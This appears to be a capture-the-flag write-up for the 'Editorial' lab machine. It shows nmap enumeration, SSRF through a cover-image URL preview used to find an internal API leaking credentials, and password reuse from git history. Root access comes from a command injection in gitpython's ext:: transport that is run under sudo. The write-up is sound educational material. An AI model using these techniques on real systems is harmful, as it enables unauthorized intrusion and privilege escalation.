Editorial

Enumeration

nmap -v -A -O -p- -Pn editorial.htb -oN nmap

Nmap scan report for editorial.htb (10.10.11.20)
Host is up (0.051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Editorial Tiempo Arriba
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=6/25%OT=22%CT=1%CU=36690%PV=Y%DS=2%DC=T%G=Y%TM=667A
OS:8DC0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Uptime guess: 47.259 days (since Thu May  9 05:15:52 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT      ADDRESS
1   49.98 ms 10.10.14.1
2   50.05 ms editorial.htb (10.10.11.20)

NSE: Script Post-scanning.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.01s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.99 seconds
           Raw packets sent: 66482 (2.929MB) | Rcvd: 65859 (2.638MB)

Port 80

On /about page we find another domain that is tiempoarriba.htb:

Directories and files enumeration with ffuf:

There is the /upload page:

The form allows you to upload a file depicting the book cover or submit the URL associated with the book cover. Also, it is possible to get a preview, but this does not seem to work because, as we can see, the file name is renamed and the file extension is removed. When we open the preview image in a new tab, the file is downloaded directly, so it seems that it is not possible to execute directly on the webserver any kind of command possibly injected into the uploaded file:

Exploitation (dev)

If we try to intercept the request we can see that the URL is not sent to the backend and the response is the usual "Request Submited! blahblahblah...":

Instead, the interesting part is the URL preview because this feature might be vulnerable to SSRF and allows an attacker to cause the server-side application to make requests to an unintended location:

but as before the file name is renamed and the file extension is removed.

However, this means that we can control the requests made from the backend to an endpoint we like externally or even internally. We check whether it is vulnerable to SSRF.

Using Burp Suite Repeater and the http://127.0.0.1 as URL for the preview, we will obtain a result in the response:

This machine may have other services in the backend, we can enumerate them burp intruder and add a port number between 1-65535.

All the requests have this path in the response when requested a preview using a URL without any service running (that is the same shown before):

So filter this string with a negative search:

And we will find the only one with a different response, the port 5000:

Download the file and inspect it, seems to be a JSON:

It appears to be exposed on port 5000 an API endpoint and this appears to be the list of exposed methods.

Testing the various endpoints, the only one of interest is the following:

and we find juicy credentials:

Username: dev

Password: dev080217_devAPI!@

With these credentials we can only try to login using SSH:

And user flag is here.

Privilege Escalation (prod)

There is another user (prod) that own also the /home/prod directory:

Using the command git log -p we can inspect all the commit messages and differences commited to git repo. We can find the prod credential changed during the downgrade from prod to dev:

Username: prod

Password: 080217_Producti0n_2023!@

Privilege Escalation (root)

The first thing to try on a Linux machine is always sudo -l:

This is the code of script allowed to run as root that performs a clone of a Git repository using the gitpython library:

#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

Searching online how work git module, we can find that EVERY version of gitpython is vulnerable to RCE

The PoC on Snyk website:

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments. This is only relevant when enabling the ext transport protocol, as done in the script with line:

multi_options=["-c protocol.ext.allow=always"]

Change the command injected by dumping the root flag and saving the output to a file under /home/prod.

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >/home/prod/root.txt'